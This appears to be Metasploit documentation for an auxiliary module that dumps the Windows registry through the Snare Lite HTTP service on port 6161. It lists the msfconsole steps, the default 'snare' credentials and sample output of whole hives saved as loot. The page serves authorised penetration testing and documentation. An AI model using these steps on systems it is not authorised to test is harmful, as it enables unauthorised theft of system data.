106 lines
4.2 KiB
Markdown
106 lines
4.2 KiB
Markdown
## Description
|
|
|
|
This module uses the Registry Dump feature of the [Snare Lite for Windows](https://sourceforge.net/projects/snare/) HTTP service on 6161/TCP to retrieve the Windows registry. The Registry Dump functionality is unavailable in Snare Enterprise.
|
|
|
|
**Note: The Registry Dump functionality accepts only one connected client at a time. Requesting a large key/hive will cause the service to become unresponsive until the server completes the request.**
|
|
|
|
|
|
## Vulnerable Application
|
|
|
|
SNARE (System iNtrusion Analysis and Reporting Environment) is a series of log collection agents that facilitate centralised analysis of audit log data.
|
|
|
|
This module has been tested successfully with Snare Lite for Windows version 4.0.2.0 on Windows XP SP3.
|
|
|
|
Snare Lite for Windows is no longer supported, however a [free trial is available](http://www.snarealliance.com/snare-open-source-agent-downloads-submission/) from the Snare Alliance website.
|
|
|
|
|
|
## Verification Steps
|
|
|
|
1. Start `msfconsole`
|
|
2. Do: `use auxiliary/gather/snare_registry`
|
|
3. Do: `set rhost [IP]`
|
|
4. Do: `set HttpUsername [USERNAME]`
|
|
5. Do: `set HttpPassword [PASSWORD]`
|
|
6. Do: `run`
|
|
7. You should get a copy of *HKLM\HARDWARE\DESCRIPTION\System* from the remote Windows system
|
|
|
|
|
|
## Options
|
|
|
|
**HttpUsername**
|
|
|
|
The username for Snare remote access (default: `snare`).
|
|
|
|
**HttpPassword**
|
|
|
|
The password for Snare remote access (default: blank).
|
|
|
|
**REG_DUMP_KEY**
|
|
|
|
Retrieve the specified registry key and all sub-keys.
|
|
|
|
**REG_DUMP_ALL**
|
|
|
|
Retrieve the entire Windows registry.
|
|
|
|
**TIMEOUT**
|
|
|
|
Timeout in seconds for downloading each registry key/hive.
|
|
|
|
|
|
## Scenarios
|
|
|
|
Retrieve a specific registry key:
|
|
|
|
```
|
|
msf auxiliary(snare_registry) > set REG_DUMP_KEY HKLM\\HARDWARE\\DESCRIPTION\\System
|
|
REG_DUMP_KEY => HKLM\HARDWARE\DESCRIPTION\System
|
|
msf auxiliary(snare_registry) > run
|
|
|
|
[*] 192.168.18.155:6161 - Retrieving registry key 'HKLM\\HARDWARE\\DESCRIPTION\\System'...
|
|
[+] 192.168.18.155:6161 - Retrieved key successfully (23092 bytes)
|
|
[+] File saved in: /root/.msf4/loot/20151225133011_default_192.168.18.155_snare.registry_842138.txt
|
|
[*] Auxiliary module execution completed
|
|
```
|
|
|
|
Retrieve an entire hive:
|
|
|
|
```
|
|
msf auxiliary(snare_registry) > set REG_DUMP_KEY HKLM
|
|
REG_DUMP_KEY => HKLM
|
|
msf auxiliary(snare_registry) > run
|
|
|
|
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKLM'...
|
|
[+] 192.168.18.155:6161 - Retrieved key successfully (10657975 bytes)
|
|
[+] File saved in: /root/.msf4/loot/20151225133147_default_192.168.18.155_snare.registry_247207.txt
|
|
[*] Auxiliary module execution completed
|
|
```
|
|
|
|
Retrieve the entire registry:
|
|
|
|
```
|
|
msf auxiliary(snare_registry) > set REG_DUMP_ALL true
|
|
REG_DUMP_ALL => true
|
|
msf auxiliary(snare_registry) > run
|
|
|
|
[*] 192.168.18.155:6161 - Retrieving list of registry hives ...
|
|
[+] 192.168.18.155:6161 - Found 5 registry hives (HKEY_CLASSES_ROOT, HKEY_CURRENT_CONFIG, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, HKEY_USERS)
|
|
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CLASSES_ROOT'...
|
|
[+] 192.168.18.155:6161 - Retrieved key successfully (3933816 bytes)
|
|
[+] File saved in: /root/.msf4/loot/20151225133222_default_192.168.18.155_snare.registry_070659.txt
|
|
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CURRENT_CONFIG'...
|
|
[+] 192.168.18.155:6161 - Retrieved key successfully (5605 bytes)
|
|
[+] File saved in: /root/.msf4/loot/20151225133222_default_192.168.18.155_snare.registry_376606.txt
|
|
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CURRENT_USER'...
|
|
[+] 192.168.18.155:6161 - Retrieved key successfully (269927 bytes)
|
|
[+] File saved in: /root/.msf4/loot/20151225133223_default_192.168.18.155_snare.registry_653681.txt
|
|
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_LOCAL_MACHINE'...
|
|
[+] 192.168.18.155:6161 - Retrieved key successfully (11446508 bytes)
|
|
[+] File saved in: /root/.msf4/loot/20151225133336_default_192.168.18.155_snare.registry_003003.txt
|
|
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_USERS'...
|
|
[+] 192.168.18.155:6161 - Retrieved key successfully (1668306 bytes)
|
|
[+] File saved in: /root/.msf4/loot/20151225133342_default_192.168.18.155_snare.registry_236335.txt
|
|
[*] Auxiliary module execution completed
|
|
```
|
|
|